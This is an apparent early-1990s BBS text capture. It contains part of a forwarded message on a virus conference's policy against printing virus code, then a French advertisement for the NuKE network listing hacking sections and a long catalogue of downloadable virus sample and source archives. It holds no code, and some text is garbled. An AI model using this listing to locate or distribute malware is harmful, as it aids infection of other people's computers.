committee, but at the time of the deliberations he (like me a
year before) wasn't on a regular e-mail host. Pretty clearly,
he is now. And he WILL have the chance to influence the rules
that govern NEXT year's (7th International) conference.
3. Rationale.
I don't necessarily agree with every punctuation mark of the
position concerning publishing code fragments, but it WAS a
vote/consensus of the conference committee, approximately thus:
a. By definition, those who attend this conference have
the resources to take off 2 or 3 days from work and
pay the modest registration fees.
Especially those who have attended before, they are pretty
well-connected in the technical community and if really
motivated could obtain the stuff you might not want your
5-year-old to fool with.
Among the 20% who are full-time security people, this is
especially true - and one reason why the anti-virus products
were fully prepared in '92 for "Michelangelo" was that most
of the major players had representatives here in '91 on
March 14 when Roger Riordan of Australia laid out how he
had discovered the thing a month beforehand, during his
scheduled speech at the conference.
b. Those whose ONLY contact with the conference is the
Proceedings, could very well have considerably less ability
to "get the code, no matter what." If the Proceedings
is on the shelf of their library, e.g., it may be their
first and only contact with viruses.
So why give the true beginners a practice set of viruses?
c. Therefore, last year and this year, speakers who dissectÔ
York, are permitted to distribute a non-Proceedings handout
to attendees.
d. Rest assured, that "c" necessitated a good-will compromise on
the part of those at the other end of the opinion spectrum
from Fred.
e. This April, procedures for the 1994 conference will be fixed
by consensus of the committee members. They will take into
account the experiences of the March 10-12 1993 sessions.
Anyone who doubts that the committee responds to realities
experienced, has only to be reminded that THIS conference
will be managed by Expoconsul, the managers of DEXPO and
other big events - NOT by the chapter volunteers who did
this task in previous years.
That's because, based on feedback, the committee was
unanimous in its sentiment that "Ides of March" clearly
hundreds of attendees past the point where it could be
run properly by amateurs.
---
* Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0)
-------
Hep les mecs... C'est dj
tout pour les messages... Pas pour
dire qu'y en a pas beaucoup, NOT!! , Y en a des tonnes... Le
NuKeNet est ax sur le Virus Talking, comme vous l'avez vu... Que dire de
plus...
Cot fichiers, Virus, CDC, PP, CPI Newsletters, LOL, CUD, PHRACK... Et
quelques autres... Tirez vos propres conclusions. Voici les sectins
fichiers :
NNN:Flag:Title :NNN:Flag:Title
===:====:==============================:===:====:======================
0 *--A [ UPLOAD ] 1 *--A [ Anti-Virii ]
2 *--A [ Virus # To L ] 3 *--A [ Virus M To Z ]
4 *--A [Original Virus Sources] 5 *--A [ Disassembled Viruses]
6 *--A [Virus Magazines & Text] 7 *N-A [ NuKE Warez ]
-N-A [ NuKE Private ] 8 *--A [H/P Magazines 'n Texts]
9 *--A [ H/P Utilities ] 10 *--A [ Phreaking Related ]
11 *--A [Anarchy Progs. & Texts] 12 *--A [ PHRACK Inc. Magazine]
13 *--A [ Cult Of The Dead Cow ] 14 *--A [ CryPt Newsletter ]
15 *--A [ CPI Newsletter ] 16 *--A [ CUD Magazine ]
17 *--A [ LOL Magazine ] 18 *--A [ PPP Magazine ]
19 *--A [ Virus-L Digest ] 20 *--A [ Misc. Files ]
On parle encore virus, l
. Voici un chantillon des sections virus, et de
ce qu'on peut y trouver...
[ Virus # To L ] #2
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Filename.Ext Bytes Description
-------- --- -------
-------------------------------------------------------
!J4J .ZIP 1 50 Plaice (1273 - Generation 1 -) Virus
100YEARB.ZIP 33 50 100-Year Virus Strain B (Frodo) [4096]
1022 .ZIP 3 50 Fellowship Virus [Fellow]
1024-B .ZIP 3 50 Nomenklatura (1024-B) [Nom]
1024PRSC.ZIP 1 50 PrtSc 1024 Virus [PS10]
1033 .ZIP 12 50 Fax Free (Pisello/1030) Virus [1030]
1049 .ZIP 1 50 1049 Virus [Alf]
1075 .ZIP 1 50 Zaragoza 1075/Minsk Virus [Zar]
10PASS3 .ZIP 1 50 10 Past 3 (748) Virus [748]
1193 .ZIP 2 50 Copyright Virus (1193) [1193]
1210 .ZIP 5 50 Prudents 1210 Virus [1210]
1244 .ZIP 2 50 1244 Virus [1244]
1253 .ZIP 2 50 1253 Virus [1253]
1260 .ZIP 1 50 1260 Virus [1260]
1381 .ZIP 1 50 Internal (1381) Virus
1530 .ZIP 3 50 Rape 1530 Virus [1530]
1554 .ZIP 1 50 1554 Virus [1554]
1554B .ZIP 5 50 1554 Strain B Virus [1554]
1559 .ZIP 18 50 1559 Virus
1575 .ZIP 2 50 1575 (Green Caterpillar) Virus [15xx]
1575-C .ZIP 5 50 1575-C (Green Caterpillar) Virus [15xx]
15APR .ZIP 1 50 Murphy - Swami Generation 1 - [Murphy]
15XX .ZIP 31 50 1575 Virus [15xx]
1600 .ZIP 1 50 Jerusalem Virus (1600) [Jeru]
1605 .ZIP 3 50 Jerusalem Virus (1605) [Jeru]
1701B .ZIP 1 50 1701 Virus, Strain B [170x]
1701MUTA.ZIP 2 50 1701 Mutation
1704 .ZIP 4 50 Cascade Virus (1704) [170X]
1704-B .ZIP 3 50 1704 Virus, Strain B [170x]
1704-C .ZIP 3 50 Cascade Virus (1704-C) [170X]
1704FRMT.ZIP 2 50 Cascade Virus (1704-Format) [170X]
170X .ZIP 4 50 170X Virus [170x]
17Y4 .ZIP 8 50 Cascade 17Y4 Virus [170X]
1963 .ZIP 4 50 1963 Necropolis Virus [1963]
1992 .ZIP 1 50 1992 Virus
1992-SK .ZIP 1 50 Skism 1992 Virus
1992_B .ZIP 1 50 1992 Virus, Strain B
2144 .ZIP 2 50 USSR-2144 Virus [U2144]
2480-2 .ZIP 1 50 2480-2 (Family-M/Crew) Virus [FM]
257 .ZIP 1 50 Kemerovo Virus (257) [Kem]
2623 .ZIP 8 50 2623 Virus [2623]
30 .ZIP 1 50 Mini Virus [M45]
3012 .ZIP 4 50 Jerusalem (AntiCad-3012/Plastique) [Plq]
307 .ZIP 1 50 Timid Virus (307) [Tmd]
3103 .ZIP 4 50 USSR-3103 Virus [Svc50]
311 .ZIP 0 50 USSR-311 Virus [U311]
312VIRUS.ZIP 13 50 312Virus
:This one is NOT exactly a Virus.. But it is FUNNY!
:Is able to run the poor sucker's Phone Bill
:through the roof!
334-2 .ZIP 3 50 334-2 Virus [ARCV] UnScaned COM
337 .ZIP 0 50 337 Virus [337]
3445 .ZIP 3 50 3445-Stealth Virus [3445]
382 .ZIP 0 50 382 Virus [382]
4 .ZIP 2 50 4 Virus [Con] VCL
405 .ZIP 0 50 405 Virus [Burger]
4096 .ZIP 3 50 4096 Virus [4096]
483 .ZIP 0 50 483 Fam3 Virus (Resurrect) [F3]
486 .ZIP 2 50 486 Family Virus (Rage) [FM]
492 .ZIP 0 50 USSR-492 Virus [U492]
4MAT2 .ZIP 1 50 4 MAT 2 Virus
512 .ZIP 0 50 512 Virus [512]
512-B .ZIP 0 50 512 Virus, Strain B [512]
512-E .ZIP 2 50 512 Strain E Virus [512]
512-F .ZIP 2 50 512 Strain F Virus [512]
512-X .ZIP 0 50 512 Strain A Virus [512]
5120 .ZIP 4 50 5120 Virus
516 .ZIP 0 50 USSR-516 Leapfrog Virus [Leap]
529 .ZIP 2 50 529 Virus [529]
529-1 .ZIP 0 50 529 Virus, Second Strain [529]
529-2 .ZIP 4 50 Piter 529 Virus [529]
535 .ZIP 0 50 535 Virus [VHP]
537 .ZIP 1 50 537 Family-Q Virus (Burger) [FQ]
541 .ZIP 0 50 541 Virus [Burger]
644 .ZIP 2 50 644 Lisbon Virus (Vienna) [Lisbon]
666 .ZIP 1 50 666 Virus (Rock Steady)
666-B .ZIP 1 50 666 Virus, Strain B (Rock Steady) [RKO]
696 .ZIP 0 50 696 FamR Virus [FR]
707 .ZIP 2 50 USSR-707 Virus
711 .ZIP 2 50 711 Family Virus (13 Minutes) [FM]
712 .ZIP 2 50 712 UNK Virus (Fumble) [UNK]
7808 .ZIP 5 50 7808 Virus (Pascal) [7808]
789 .ZIP 1 50 789 Zaragoza Virus (FileHider) [Zar]
7SON .ZIP 0 50 7thSon Virus [7s]
7SON2 .ZIP 1 50 7th Son II (332 Generation) [F-Prot]
801 .ZIP 6 50 Dot-801 Virus (StarDot) [I-F]
812 .ZIP 1 50 812 JW2 Virus (Jabberwocky) [Jab]
817 .ZIP 1 50 DOt-801 Virus (StarDot-Modified) [I-F]
855 .ZIP 32 50 855 Virus (November 17th) [855]
905 .ZIP 1 50 905 Virus [905]
911 .ZIP 2 50 911 Armagedon Virus [Arma]
981 .ZIP 16 50 981 Fichv Virus [FCH]
994 .ZIP 2 50 994 Nina Virus (DotEater) [Nina]
ACME .COM 1 50 ACME companion virus - from Cryptletter 9
ADA .ZIP 3 50 Ada Virus [Ada]
ADOLPH .ZIP 2 50 Adolph Virus [V2P6]
ADVENT .ZIP 2 50 Advent Virus [SysLock]
AGIPLAN .ZIP 1 50 AgiPlan Virus [AGI]
AIDS@ .ZIP 10 50 Aids Virus [N1]
AIDSII .ZIP 5 50 AIDS ][ Virus [A2]
AIRCOP .ZIP 1 50 AirCop Virus
AIRCOP2 .ZIP 1 50 AirCop ][ Virus [Dr2]
AKUKU .ZIP 1 50 Akuku Virus [Akuku]
ALA-1652.ZIP 2 50 Ala Virus [Alabama]
ALABAMA .ZIP 1 50 Alabama Virus (1560) [Alabama]
ALEMEDA .ZIP 10 50 Alemeda Virus
ALLO .ZIP 7 50 Allo Virus
AMBULANC.ZIP 1 50 Ambulance Car Virus [RedX]
AMILIA .ZIP 2 50 Amilia Virus (Rock Steady) [Murphy]
AMOEBA .ZIP 3 50 1392 Amoeba Virus [1392]
AMOEBA-2.ZIP 1 50 Amoeba ][ Virus [1392]
AMST-299.ZIP 1 50 Amstrad 299 Virus [Pix]
AMST-345.ZIP 1 50 Amstrad 345 Virus [Pix]
AMST-740.ZIP 1 50 Amstrad 740 Virus [Pix]
AMST-847.ZIP 1 50 Amstrad 847 Virus [Pix]
AMST-850.ZIP 1 50 Amstrad 850 Virus [Pix]
AMST-852.ZIP 0 50 Amstrad 852 Virus [Pix]
AMSTRAD .ZIP 0 50 Amstrad Pure Strain Virus [Amst]
AMUSAK .ZIP 6 50 Amusak Virus
ANARKIA1.ZIP 1 50 Anarkia Virus [Jeru]
ANARKIA2.ZIP 2 50 Anarkia-2 (Jeru Related) [FU]
ANNA .ZIP 3 50 Anna Virus [ARCV] UnScaned COM
ANTHRAX .ZIP 1 50 Anthrax Virus [Atx]
ANTIC10K.ZIP 19 50 Famous 10k Virus
ANTICAD .ZIP 1 50 AntiCad Virus (1253) [1253]
ANTICST .ZIP 1 50 Anti-Christ Virus [Pest]
ANTIFAG .ZIP 1 50 Anti-Fag Virus [VHP]
ANTIFIRE.ZIP 0 50 Anti-Fire Virus
ANTIMON .ZIP 2 50 Antimon Virus [1453]
ANTITEL .ZIP 1 50 Anti-Tel Virus ( Boot Sector ) [A-Vir]
ANTI_D .ZIP 2 50 Anti_D (or FamR) Virus [FR]
ANTI_DAF.ZIP 3 50 Anti DAF virus
AP-400 .ZIP 0 50 Anti-Pascal 400 Virus [AP]
AP-440 .ZIP 0 50 Anti-Pascal 440 Virus [AP]
AP-480 .ZIP 0 50 Anti-Pascal 480 Virus [AP]
AP-529 .ZIP 0 50 Anti-Pascal 529 Virus [AP-2]
AP-605 .ZIP 0 50 Anti-Pascal 605 Virus [AP-2]
APOC .ZIP 3 50 Apocalypse Virus [Jeru]
APOCII .ZIP 2 50 Apoc ][ Virus [2000]
ARCV-1 .ZIP 2 50 ARCV #1 [ARCV] UnScaned COM
ARCV-2 .ZIP 2 50 ARCV #2 [ARCV] UnScaned COM
ARCV-3 .ZIP 2 50 ARCV #3 [ARCV] UnScaned COM
ARCV-4 .ZIP 2 50 ARCV #4 [ARCV] UnScaned COM
ARCV-5 .ZIP 2 50 ARCV #5 [ARCV] UnScaned COM
ARCV-6 .ZIP 1 50 ARCV #6 [ARCV] UnScaned COM
ARCV-7 .ZIP 2 50 ARCV #7 [ARCV] UnScaned COM
ARCV-8 .ZIP 2 50 ARCV #8 [ARCV] UnScaned COM
ARCV-9 .ZIP 2 50 ARCV #9 [ARCV] UnScaned COM
ARCV93 .ZIP 2 50 ARCV'93 Virus [ARCV] UnScaned
ARCVSAND.ZIP 3 50 ARCV Snadwiich Virus [ARCV] UnScaned TSR-COM
ARF .ZIP 1 50 Arf Virus (Parasite) [Par]
ARF-B .ZIP 0 50 ARF Strain B Virus [VHP]
ARMAGEDO.ZIP 1 50 Armaggedon Virus [Arma]
ASHAR .ZIP 2 50 Ashar Virus (Brain-Dropper) [Drp]
AT144 .ZIP 0 50 AT144 Virus [144]
ATTENTN .ZIP 0 50 Attention Virus (USSR-394) [U394]
AZUSA .ZIP 4 50 Azusa Virus
BACKTIME.ZIP 0 50 Backtime Virus [BT]
BADBOY .ZIP 1 50 Bad Boy Virus [BB]
BADBOY2 .ZIP 1 50 Bad Boy Strain ][ Virus [BB]
BADGUY-2.ZIP 0 50 BadGuy Virus Strain 2 (I-B) [IB]
BADTASTE.ZIP 2 50 Badtaste Virus (Murphy) [Murphy]
BANANA .ZIP 1 50 Banana Virus (Trivial) [OW]
BANDIT .ZIP 1 50 Bandit Virus [Ban]
BARCELON.ZIP 4 50 Barcelona Virus [Barc]
BASICVIR.ZIP 5 50 Basic Virus
BATVIR .ZIP 0 50 Batch File Virus
BB .ZIP 0 50 Bad Brains Virus
BEAST .ZIP 0 50 Beast-N-Black Virus [GenF]
BEBE .ZIP 2 50 BEBE Virus [BeBe]
BEDTIME .ZIP 4 50 Bedtime Virus
BEEPER .ZIP 2 50 Beeper Virus [Beep]
BEST .ZIP 1 50 Best Wish Virus [BWish]
BFD .ZIP 3 50 BFD Virus [BFD]
BLAZE .ZIP 0 50 Eternal Blaze Virus
BLJEC3 .ZIP 0 50 Bljec-3 Virus [Blj]
BLJEC4 .ZIP 0 50 Bljec-4 Virus [Blj]
BLJEC5 .ZIP 0 50 Bljec-5 Virus [Blj]
BLJEC6 .ZIP 0 50 Bljec-6 Virus [Blj]
BLJEC8 .ZIP 0 50 Bljec-8 Virus [Blj]
BLJEC9 .ZIP 0 50 Bljec-9 Virus [Blj]
BLOOD .ZIP 0 50 Blood Virus [Blood]
BLOODLUS.ZIP 1 50 Blood Lust Virus [Blus]
BLOODY .ZIP 0 50 Bloody Virus ( Boot Sector ) [Bloody]
BMONDAY .ZIP 1 50 Black Monday Virus [BMon]
BOBINST .ZIP 12 50 Bob Ross Virus Installer v.99b
BOBVIRUS.ZIP 8 50 Bob Virus [Bet]
BOOKOVIR.ZIP 72 50 Book of Viruses (Various Virii)
BOOT1 .ZIP 2 50 Boot 1 Virus (Ping Pong -B) [Ping]
BOOT2 .ZIP 2 50 Boot 2 Virus
BOYS .ZIP 0 50 Boys Virus [Boys]
BRAINVRS.ZIP 0 50 Pakistani Brain Virus [Brain]
BRENDA .ZIP 0 50 Brenda Virus [Tiny]
BRN_ASH .ZIP 47 50 Brain Ashar Virus [Brain]
BROTHER .ZIP 1 50 Brother Virus
BUBBLE .ZIP 1 50 Bubble Virus (1244) [1244]
BURGER@ .ZIP 4 50 Burger Virus [Burger]
BURGR541.ZIP 2 50 Burger-541 Virus (Family-Q) [FQ]
BUSH .ZIP 0 50 Bushishiro Virus [GenF][VHP]
BUSTED .ZIP 0 50 Busted Virus [Bst]
BUTSTINK.ZIP 4 50 Butt Stink Virus ( Who makes up these names? )
CANCER .ZIP 0 50 Cancer Virus [Pix]
CANNAB2 .ZIP 0 50 Cannabis-2
CANSU .ZIP 0 50 Cansu/V-Sign Virus
CAPTRIPS.ZIP 27 50 Captain Trips Virus [Jeru-A]
CARIOCA .ZIP 1 50 Carioca Virus [Carioca]
CASCADE .ZIP 1 50 Cascade Virus [170X]
CASCDE-A.ZIP 4 50 Cascade (1701-A) Virus [170X]
CASPER .ZIP 1 50 Casper Virus [Casper]
CATMAN .ZIP 1 50 Catman Virus [Ctm]
CAZ .ZIP 2 50 CAZ Virus [F-prot]
CBOMBER .ZIP 12 50 Bomber Virus [Bmb]
CD .ZIP 2 50 CD Virus [CD]
CDM11 .ZIP 2 50 Cinco de Mayo 1.1 Infects COM B4 12:00 EXEs after
:Cinco de Mayo virus. Infects COM files before noon
:EXE files after noon and a surprise on May 5th.
:[MPC]/[VCL] Hybrid
CEMETARY.ZIP 3 50 Cemetary Virus [Pest]
CHEEBA .ZIP 3 50 Cheeba Virus [Che][CHB]
CHEESY .ZIP 0 50 Cheesy Virus
CHNG-MPC.ZIP 2 50 Chuang Virus (MPC Production) [MPC]
CHRONO .ZIP 3 50 Chrono Virus
CHUANG .ZIP 1 50 Chuang Virus (VCL Production) [Con] VCL 5
CIA .ZIP 1 50 CIA Virus [Burger]
CIA2 .ZIP 3 50 CIA Virus (Burger/Family-Q) [FQ]
CINDER .ZIP 2 50 Cinderella Virus (FamS) [FS]
CIVIL_4B.ZIP 4 50 Civil War 4B
:Rewritten with TPE 1.3
CIVIL_4C.ZIP 2 50 Civil War 4C
:Rewritten with TPE 1.3
CLONE .ZIP 18 50 Clone Virus (Jerusalem) [Jeru]
CODEZERO.ZIP 0 50 Code Zero Virus
COLUMBUS.ZIP 14 50 Columbus Virus
COMDEX .ZIP 25 50 Comdex Virus
COOKIE .ZIP 3 50 Cookie Virus
COP-MPL .ZIP 2 50 Variation of Akuka
COSSIGNA.ZIP 2 50 Cossigna Virus [1204]
CRASH .ZIP 2 50 Crash Dummy Virus (VCL Product) [Con] VCL 5
CREEPER!.ZIP 2 50 Creeper Virus [Crp]
CRF .ZIP 0 50 CRF Virus [Crf]
CRIMEIIB.ZIP 1 50 DataCrime 2B Virus [Crime-2B]
CRUMBLE .ZIP 2 50 Crummble Virus (Falling Letters) [Crm]
CRYPTM .ZIP 8 50 CryptM Virus [Mut][DAME]
CRZYEDIE.ZIP 1 50 Crazy Eddie Virus
CVIRUS .ZIP 25 50 C Virus [CV]
CVIRUS20.ZIP 11 50 C-Virus v2.0 (NuKE)
CVIRUS21.ZIP 15 50 C-Virus v2.1 ( NuKE )
CVIRUS3 .ZIP 11 50 C-Virus v3 ( NuKE )
CW .ZIP 1 50 CW Virus (VirusDemo Clone) [Burger]
CYBER101.ZIP 3 50 Cybertel v1.01 Virus
CYBERTEL.ZIP 3 50 Cybernetic Intelligence Virus
D-DANCE .ZIP 1 50 Devil's Dance Virus [Dance]
D-FX .ZIP 2 50 Death F/X Virus [Blj]
D-FX2 .ZIP 0 50 Death F/X ][ Virus
DAMAGE .ZIP 2 50 Damage Virus [Alf]
DAMIEN .ZIP 0 50 Damien Virus
DARKAVEN.ZIP 1 50 Dark Avenger Virus [Dav]
DARKLORD.ZIP 1 50 Dark Lord Virus [Ter]
DARTH2 .ZIP 0 50 Darth Vader ][ Virus [512]
DARTH4 .ZIP 0 50 Darth-4 Virus [512]
DATACR-2.ZIP 2 50 DataCrime 2 [DC-2]
DATACR-B.ZIP 2 50 DataCrime 1B [Crime]
DATACRIM.ZIP 1 50 Datacrime Virus (1168) [Crime]
DATALOCK.ZIP 1 50 DataLock Virus [Data]
DATCRM2B.ZIP 1 50 DataCrime 2B Virus [C-2B]
DAVEN-B .ZIP 1 50 Dark Avenger Virus, Strain B [Dav]
DAVID .ZIP 1 50 David Virus [Alf]
DBASE .ZIP 1 50 DBase Virus [Dbase]
DBL_VISN.ZIP 5 50 Double Vision Virus
DC-1168 .ZIP 1 50 DataCrime 1168 Virus [Crime]
DC-B .ZIP 0 50 Death Cow Virus, Strain B
DDAY10A .ZIP 3 50 Dooms Day V1.0A Virus
DDRUS .ZIP 0 50 Ddrus Variant Of Vienna
DEADLY .ZIP 10 50 Deadly Virus (Jerusalem) [Jeru]
DEADPOOL.ZIP 1 50 DeadPool Virus
DEATHCOW.ZIP 0 50 Deathcow Virus
DEFINE .ZIP 0 50 Define Virus [Def]
DEICIDE .ZIP 0 50 Deicide Virus [Dei]
DELYRIUM.ZIP 1 50 Delyrium (Murphy Strain) [Murphy]
DEMOLITN.ZIP 1 50 Demolition Virus [Dmo]
DEMON .ZIP 0 50 Demon Virus [Demon]
DENZUK .ZIP 5 50 Den Zuk Virus [DenZuk]
DEST2 .ZIP 1 50 Dest ][ Virus [DES]
DESTI .ZIP 3 50 Desti Virus
DESTRUCT.ZIP 1 50 Destructor Virus [Destr]
DHOG .ZIP 3 50 Define Virus [Def]
DIABOLIK.ZIP 1 50 Diabolik Virus [Murphy]
DIAMOND .ZIP 1 50 Diamond Virus [1024]
DIOGENES.ZIP 3 50 DioGenes Virus (New VCL)
DIR .ZIP 0 50 DIR Virus [DIR]
DIRII .ZIP 1 50 Dir-2/FAT Virus [D2]
DIRR .ZIP 3 50 DIR Virus
DISKKILL.ZIP 0 50 Diskkiller Virus
DODO .ZIP 0 50 Dodo (birdie) Virus [Dod]
DODO-PIG.ZIP 0 50 Dodo-Pig (Dodo-407) [Dod]
DOMEVIR .ZIP 29 50 DOME Virus With Sources
DONOTH-B.ZIP 1 50 Do Nothing - B Virus [Not]
DONOTHIN.ZIP 0 50 Do Nothing Virus [Nothing]
DONTELLO.ZIP 1 50 Donatello Virus [VCL][Con]
DOOMII .ZIP 1 50 Doom ][ Virus [Dm2]
DOOMSDAY.ZIP 4 50 Doomsday Virus (Null/Scion) [Nl]
DOTEATER.ZIP 1 50 DotEater Virus (Nina) [Nina]
DOTKILL .ZIP 1 50 Dot Killer Virus [Dot]
DR20 .ZIP 3 50 Data Rape 2.0 Virus
DR22 .ZIP 6 50 Data Rape 2.2 Virus [Su2]
DR23 .ZIP 2 50 Data Rape 2.3 Virus
DRAPE-21.ZIP 0 50 Datarape v2.1
DROPPER2.ZIP 1 50 Dropper 2 Virus [Dr2]
DROPSY .ZIP 3 50 Dropsy Virus (Timid)
DRQUMAK .ZIP 1 50 Dr. Qumak Virus [Lisbon]
DUMB .ZIP 8 50 Dumb Virus
DURANGO .ZIP 6 50 Durango Virus (Viper/Leprosy) [Vip]
DURBAN .ZIP 0 50 Durban Virus [Arma]
DUTCH555.ZIP 0 50 Dutch 555 Virus [Dt]
EAR .ZIP 2 50 Ear Virus [Ear]
EARNESTO.ZIP 2 50 Earnesto Virus [UnScannable]
EBV .ZIP 0 50 Eternal Blaze Virus
EDV .ZIP 2 50 EDV Virus
ELVIS .ZIP 1 50 Elvis Virus (Phalcon)
EMF .ZIP 0 50 EMF Virus [Emf]
EMFII .ZIP 0 50 EMF ][ Virus [Sr]
ENCROAC2.ZIP 3 50 ENCROACHER 2-MtE, anti-CPAV, dirties files after din
ENCROACH.ZIP 3 50 ENCROACHER - MtE-loaded anti-CPAV virus
ENEMY .ZIP 1 50 Enemy Virus (Scr-2) [696]
ENGLAND .ZIP 0 50 England Virus (334) [334]
ENIGMA .ZIP 1 50 Enigma Virus [Enigma]
ERASMUS .ZIP 1 50 Erasmus Virus (Murphy) [Murphy]
EUROPE92.ZIP 1 50 Europe 92 Virus [E-92]
EVIL .ZIP 2 50 Evil Virus [Plr]
EVIL-D .ZIP 2 50 Evil-D Virus [Plr]
EXPLODE .ARJ 1 50 Explode Virus (New Trivial)
EXTERM .ZIP 0 50 Exterminator Virus [IB]
FAKOFILE.ZIP 55 50 Dropper for VCL-Viriant [OW]
FAMILY-N.ARJ 1 50 Family-N Virus [FN]
FAMILY-Q.ARJ 0 50 Family-Q Virus [FQ]
FATHERCH.ZIP 1 50 Father Christmas Virus [GenF][Lisbon]
FEAR .ZIP 2 50 Fear Virus [Mut]
FELLOW .ZIP 3 50 Fellowship Virus [fellow]
FEXE10ER.ZIP 2 50 FEXE or 10ER virus - looks like a research virus
FGT .ZIP 1 50 FGT Virus [FN]
FIL .ZIP 2 50 Fil Virus [Fil]
FILLER .ZIP 3 50 Filler Virus [Filler]
FINGER .ZIP 1 50 Finger Virus [Murphy]
FINN-709.ZIP 1 50 Finnish Virus (CSL Related) [CSL]
FIRE-V .ZIP 3 50 Fire Virus
FISH .ZIP 4 50 Fish Virus [Fish]
FISH2 .ZIP 3 50 Fish ][ Virus [Fish]
FLASH .ZIP 2 50 Flash Virus [Flash]
FLEXITUP.ZIP 1 50 Flex Virus
FLIP .ZIP 52 50 Flip Virus [Flip]
FLIP2143.ZIP 5 50 Flip-2143 Virus [Flip]
FLIP2343.ZIP 2 50 Flip-2343 Virus [Flip]
FONER .ZIP 23 50 Foner Boot Virus
FORM .ZIP 126 50 Form Virus - TD0
FRANCE .ZIP 1 50 France Virus (ZK900) [Z900]
FREEW692.ZIP 1 50 FreeW Virus (Bob Viraint) [Bob]
FRERE .ZIP 3 50 Frere Virus [Mule][Jeru]
FREREJ .ZIP 1 50 Frere Jacques Virus [Mule][Jeru]
FRIDAY .ZIP 4 50 Friday Virus (AntiCad/Plastique) [Plq]
FRIENDS .ZIP 3 50 Friends Virus [ARCV] UnScaned COM
FRODO .ZIP 3 50 Frodo Virus (4096) [4096]
FROGS .ZIP 1 50 Frogs Virus [Frg]
FUCKYOU .ZIP 0 50 Fuck You Virus [FW]
FUMANCHU.ZIP 2 50 Fu Man Chu Virus [Fu]
FUNKYKEY.ZIP 17 50 FunkyKey Virus
FUTHARK .ZIP 2 50 Futhark Virus
FVHS-A .ZIP 2 50 FVHS-A Virus (modified Leprosy)
FVHS-B .ZIP 3 50 FVHS-B Virus (Modified Leprosy)
G2-70B .ZIP 47 50 P/S Mass code producer
GEE .ZIP 14 50 Gee Virus (number 1) [N1]
GEEK .ZIP 1 50 Geek Virus
GENERIC .ZIP 4 50 Family-Q Virus [FQ]
GENESIS .ZIP 18 50 Genesis Virus
GERGANA .ZIP 1 50 Gergana 182 Virus [Gerg]
GHOST .ZIP 2 50 Ghostballs Virus (Family Virus) [FM]
GIANTKLL.ZIP 6 50 Giant Kill Virus
GOBLIN .ZIP 3 50 Goblin Virus (Cracker) [CRJ]
GOOBER .ZIP 2 50 Goober Virus [Def] Define
GOOBER2 .ZIP 0 50 Goober II Virus (VCL) [Con] VCL 2
GOTCHA1 .ZIP 1 50 gotcha-1 (A-Generation) [Gtc]
GOTCHA4 .ZIP 1 50 Gotcha-4 (E Generation) [Gtc]
GREEMLIN.ZIP 2 50 Diamond Greemlin Virus (Alfa) [Alf]
GREEN .ZIP 1 50 Green Joker Virus [GRE]
GREETING.ZIP 2 50 Greetings Virus
GRITHER .ZIP 0 50 Grither Virus [GenF][Lisbon]
GRLINKS .ZIP 3 50 Jerusalem Groen Links Virus [Jeru]
GROUCH .ZIP 3 50 Grouch Virus (Timid Clone) [Tmd]
GROUCH-E.ZIP 2 50 Grouch-E Virus (Timid Clone) [Tmd]
GROUCH1 .ZIP 4 50 Grouch Virus (Timid Clone) [Tmd]
GRUNT-1 .ZIP 2 50 Grunt-1 Virus [Grt-1]
GRUNT2 .ZIP 2 50 Grunt-2 Virus UnScannable
GRUNT4 .ZIP 2 50 Grunt-4 Virus UnScanable
GUPPY .ZIP 1 50 Guppy Virus [Guppy]
HACKTIC .ZIP 1 50 Tic Virus (109) [109]
HAHA .ZIP 1 50 HaHa Virus [Sunday]
HAIFA .ZIP 5 50 Haifa Virus [Hf]
HALLOE .ZIP 5 50 Halloechen Virus [Hal]
HAPPY .ZIP 4 50 Happy New Year Virus [HNY][Vor]
HAPPY-N .ZIP 6 50 Happy N.Y Virus [HNY][Vor]
HARAKI2 .ZIP 3 50 Harakiri Virus
HARAKIRI.ZIP 6 50 Harakiri Virus
HBT .ZIP 0 50 HBT Virus
HEEVA .ZIP 52 50 Heeva Virus
HEHHEH .ZIP 2 50 Heh Heh Virus (Timid Clone) [F-Prot]
HERO .ZIP 0 50 Hero Virus [Hero]
HH&H .ZIP 3 50 HH&H Virus
HIDOS .ZIP 3 50 HiDos Virus [ARCV] UnScaned TSR-Boot
HIGHLAND.ZIP 3 50 HighLander Virus
HIV .ZIP 1 50 HiV Virus [Murphy]
HIV-B .ZIP 1 50 Hiv Strain B
HOLLAND .ZIP 1 50 Holland Girl Virus [Sylvia]
HORSE-3 .ZIP 1 50 Horse-3 Virus [Hrs]
HORSE-4 .ZIP 1 50 Horse-4 Virus [Hrs]
HORSE-8 .ZIP 2 50 Horse-8 Virus [Hrs]
HORSE2 .ZIP 1 50 Horse 2 Virus [Hrs]
HORSE5 .ZIP 1 50 Horse 5 Virus [Hrs]
HORSE6 .ZIP 1 50 Horse 6 Virus [Hrs]
HR .ZIP 2 50 Hellraiser/Skism 18 Virus
HUNGARY .ZIP 1 50 Hungary Virus [Hng]
HYBRYD .ZIP 1 50 Hybryd Virus [Hyb]
HYDRA-0 .ZIP 0 50 Hydra Strain 0 Virus [Pix]
HYDRA-1 .ZIP 0 50 Hydra Strain 1 Virus [Pix]
HYDRA-2 .ZIP 0 50 Hydra Strain 2 Virus [Pix]
HYDRA-3 .ZIP 0 50 Hydra Strain 3 Virus [Pix]
HYDRA-4 .ZIP 0 50 Hydra Strain 4 Virus [Pix]
HYDRA-5 .ZIP 0 50 Hydra Strain 5 Virus [Pix]
HYDRA-6 .ZIP 0 50 Hydra Strain 6 Virus [Pix]
HYDRA-7 .ZIP 0 50 Hydra Strain 7 Virus [Pix]
HYDRA-8 .ZIP 0 50 Hydra Strain 8 Virus [Pix]
HYMN .ZIP 1 50 Hymn Virus [Hymn]
HYMN2 .ZIP 2 50 Hymn ][ ( Sverdlov ) Virus [Sv]
ICE-3 .ZIP 1 50 Icelandic III
IGOR .ZIP 5 50 Igor Virus
INCOM .ZIP 1 50 Incom Virus [Inc]
INFINITI.ZIP 0 50 Infiniti Virus [GenF]
INSUFF3 .ZIP 7 50 InStuff-3 equiped with MTE [MTE][DAME]
INTRUDER.ZIP 1 50 Intruder
INVADER .ZIP 2 50 Invader Virus [Invader]
IRAQUI .ZIP 0 50 Iraqui Warrior Virus [Iwar]
ISRAELI .ZIP 2 50 Israeli Virus [Jeru]
ISRAELV .ZIP 0 50 Israel V Virus
IT-PEST .ZIP 1 50 Cemetery Virus (Murphy) [Murphy]
ITAVIR .ZIP 3 50 Itavir Virus
ITTI .ZIP 0 50 Itti-Bitti Virus, Strains A & B (NuKE)
